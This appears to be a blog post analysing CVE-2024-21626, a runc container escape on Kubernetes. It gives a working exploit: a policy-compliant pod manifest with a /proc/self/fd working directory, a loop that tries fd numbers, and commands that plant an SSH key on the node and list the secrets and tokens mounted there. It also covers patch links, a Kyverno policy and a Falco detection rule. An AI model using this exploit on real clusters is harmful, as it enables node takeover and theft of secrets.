CVE-2024-21626 container breakout on Kubernetes
Analysis of the CVE
On the 31st of January 2024, a new CVE was released for the runc container runtime which makes it possible to break out of a container.
The short summary of the CVE is that, due to an internal file descriptor leak in runc, it is possible to access the host’s filesystem from within a container by starting the container with a specific working directory.
This affects runc 1.1.11 and earlier.
More info can be found in the very thorough security advisory in the runc GitHub repository: opencontainers/runc/GHSA-xr7r-f8xq-vfvv
Since runc is the container runtime used by containerd, and containerd is used by most Kubernetes clusters, how will this CVE affect your Kubernetes cluster?
Are you protected against this CVE if you are enforcing the “restricted” Pod Security Standard (PSS) with an admission controller like Pod Security Admission, Kyverno or Gatekeeper?
Can this CVE be exploited when you don’t allow root containers, for example?
Let’s put on our hacker hats and explore!
Translation of the CVE to a Kubernetes manifest
Let’s try attack 1 from the CVE documentation: if you set the container process.cwd to /proc/self/fd/7/ (the 7 can be environment specific and depends on the file descriptor opening order in runc), it will leave the host filesystem accessible.
In a Kubernetes pod manifest the process.cwd (cwd stands for current working directory) is set with spec.containers[].workingDir.
I am also interested in testing whether this CVE can be exploited while remaining compliant with the Pod Security Standard. So in the following example I set the securityContext as strict as possible, so that the container fully complies with the PSS and would be allowed to run on the cluster even with the “restricted” profile enforced.
I chose to run as user 1000 since that is the default uid of the first user on most Linux distributions; this user probably exists on the underlying node, which gives me write access to that user’s home folder and to files writable by its group.
A simple sleep infinite keeps the container running so I can kubectl exec -it into it to get a shell.
---
apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
  namespace: cve-2024-21626
spec:
  containers:
    - name: container
      image: alpine
      workingDir: /proc/self/fd/7
      command:
        - sleep
        - infinite
      securityContext:
        capabilities:
          drop:
            - ALL
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        seccompProfile:
          type: RuntimeDefault
        runAsNonRoot: true
        runAsUser: 1000
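To follow along with the demo below, the pod can be created and entered with kubectl; a minimal sketch, assuming the manifest above is saved as malicious-pod.yaml:

# Create the namespace referenced in the manifest, then start the pod
kubectl create namespace cve-2024-21626
kubectl apply -f malicious-pod.yaml

# Once the pod is Running, open a shell inside the container
kubectl exec -it -n cve-2024-21626 malicious-pod -- /bin/sh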
Demonstration
So in the GIF below you can see three screens; the top screen shows the running pods in the cve-2024-21626 namespace, and the bottom screen is a shell on the node where the pod runs, accessed via SSH.
First, in the bottom node shell, I show that the ~/.ssh/authorized_keys file is empty.
Then I create the Kubernetes pod from the pod spec above; you can see it starting in the top screen.
Then I use kubectl exec -it to get a shell in the container and, lo and behold, under ../../../../ the node filesystem is present!
As a demonstration I edit ../../../../home/ubuntu/.ssh/authorized_keys to gain remote access to the ubuntu user on this node, and show in the node shell that it has indeed been edited on the node.
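From the container shell, the edit in the GIF boils down to appending a public key through the leaked file descriptor; a sketch of that step, where the attacker’s public key in $PUB_KEY is my own assumption:

# Inside the container: the cwd is /proc/self/fd/7, which points into the host filesystem
ls ../../../../                # lists the node root: bin, etc, home, var, ...

# Append an attacker-controlled public key for the ubuntu user (uid 1000 owns this file)
echo "$PUB_KEY" >> ../../../../home/ubuntu/.ssh/authorized_keys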
I have tested this pod on Azure AKS and on a local cluster set up with Rancher RKE2, and on both I was able to get this working.
The only thing that takes some trial and error is the /proc/self/fd/7/ path; the number changes even on the same node.
The biggest success rate was with /proc/self/fd/7/, but /proc/self/fd/9/ was also common.
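One way to deal with that trial and error is to template the manifest over a few candidate fd numbers and see which pod comes up; a rough sketch, again assuming the manifest is saved as malicious-pod.yaml:

# Create one pod per candidate fd; pods whose workingDir does not resolve
# on the node will typically fail with a CreateContainerError
for fd in 4 5 6 7 8 9; do
  sed -e "s|/proc/self/fd/7|/proc/self/fd/$fd|" \
      -e "s|name: malicious-pod|name: malicious-pod-$fd|" \
      malicious-pod.yaml | kubectl apply -f -
done
kubectl get pods -n cve-2024-21626   # any Running pod is a candidate to exec into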
Implications
As seen in the demo above, it is pretty easy to gain access to the node filesystem by exploiting this CVE. The demo was fairly simple and required a shell into a container where I executed some manual steps. But this can easily be automated and put into a container image that looks normal but still adds a malicious SSH key or payload to the underlying node. That image then only needs to be started on the cluster to be effective.
As soon as someone has access to the node, your whole cluster is pretty much compromised. The pods running on the node mount their secrets (database passwords, Kubernetes API tokens), configmaps and volumes under /var/lib/kubelet/pods, so a quick look through those directories can give you access to the databases belonging to the apps.
Since those files and directories are readable by everyone on the system, you don’t need to be root in the container to access them.
# ls -l /var/lib/kubelet/pods/b68ccf8b-ebc9-4cd7-8454-92ead5d0887e/volumes/kubernetes.io~secret/config/
lrwxrwxrwx 1 root root 13 Feb 6 22:00 config.yaml -> ..data/config.yaml
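From inside the escaped container the same trick works over the relative host path, so you can enumerate every secret the kubelet has mounted on that node; a small sketch (the kube-api-access path applies to recent Kubernetes versions):

# List the secret volumes mounted for all pods on this node
ls -l ../../../../var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/

# Service account tokens live in projected volumes per pod
find ../../../../var/lib/kubelet/pods -path '*kube-api-access*' -name token 2>/dev/null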
So it is not just your Kubernetes cluster that is at risk; even services accessed from the cluster can now be at risk.
Mitigation and detection
As seen above, just having a tool that analyses the pod manifest (PSA, Kyverno, Gatekeeper) falls short of catching this CVE, since you can run the pod with the most “restricted” pod security settings and still exploit it.
The easiest mitigation is to update to the patched runc 1.1.12, which is available as we speak.
Since most of you use a (cloud) product that integrates runc, here is a set of links for reference on the versions in which runc has been patched:
- AWS/AWS-2024-001
- Azure/AKS#4080
- Google Cloud/GCP-2024-005
- k3s-io/k3s#9332, available in v1.26.13+k3s2, v1.27.10+k3s2, v1.28.6+k3s2 and v1.29.1+k3s2
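To verify what your nodes actually run, you can also check the runc version directly on a node; the exact output varies per distribution:

# On the node, e.g. over SSH
runc --version
# "runc version 1.1.12" (or later) means the node is patched;
# 1.1.11 and earlier are vulnerable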
If patching is for some reason not yet possible, you can decrease the risk by only allowing images to be pulled from a trusted registry, to avoid a malicious image from the internet being run through social engineering or by accident. This can be set up with the help of an admission controller like Kyverno or Gatekeeper: you create an admission policy that only allows images from a certain registry URL. It is then your responsibility to keep those images secure, as the base image you build from could still be compromised.
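As an illustration, such a policy could look like the Kyverno sketch below; registry.example.com is a placeholder for your own trusted registry, and a real policy would also need to cover initContainers and ephemeralContainers:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: trusted-registry-only
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "Images may only be pulled from registry.example.com."
        pattern:
          spec:
            containers:
              - image: "registry.example.com/*"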
For runtime detection, the awesome people at Snyk have made a detection tool available for container breakouts, or “leaky vessels” as they call them. snyk/leaky-vessels-dynamic-detector watches for and checks against a set of possible container breakouts. You can run this tool as a DaemonSet on Kubernetes to detect just CVE-2024-21626, or run it privileged on the node to detect all the mentioned vulnerabilities.
It prints to stdout when an exploit is detected, and you can set up alerts on these log lines for detection.
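A bare-bones DaemonSet for the detector could look roughly like the sketch below; the image reference is a placeholder (see the project README for how to obtain or build the actual image), and I am assuming here that its probes need a privileged container with host PID access:

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: leaky-vessels-detector
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: leaky-vessels-detector
  template:
    metadata:
      labels:
        app: leaky-vessels-detector
    spec:
      hostPID: true            # observe runc processes on the node
      containers:
        - name: detector
          image: registry.example.com/leaky-vessels-dynamic-detector:latest  # placeholder
          securityContext:
            privileged: true   # assumed to be required for the runtime hooks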
Another way to detect whether someone is exploiting this CVE is with Falco. The user @NitroCao shared the following Falco rule on his GitHub, but he places an asterisk on it: filtering out false positives with proc.name != "runc:[1:CHILD]" is not a good solution.
# source: https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file#how-to-detect
- macro: container
  condition: (container.id != host and container.name exists)
- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
  desc: >
    Detect CVE-2024-21626, runC escape vulnerability through /proc/[PID]/cwd.
  condition: >
    container and (
      (evt.type = execve and proc.cwd startswith "/proc/self/fd") or
      (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or
      (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")
    ) and proc.name != "runc:[1:CHILD]"
  output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
  priority: CRITICAL
So where possible I would advise to just upgrade to the latest runc; then you are sure this CVE has been mitigated.
Hopefully you found this post useful. It was for sure fun for me to play around with this CVE :)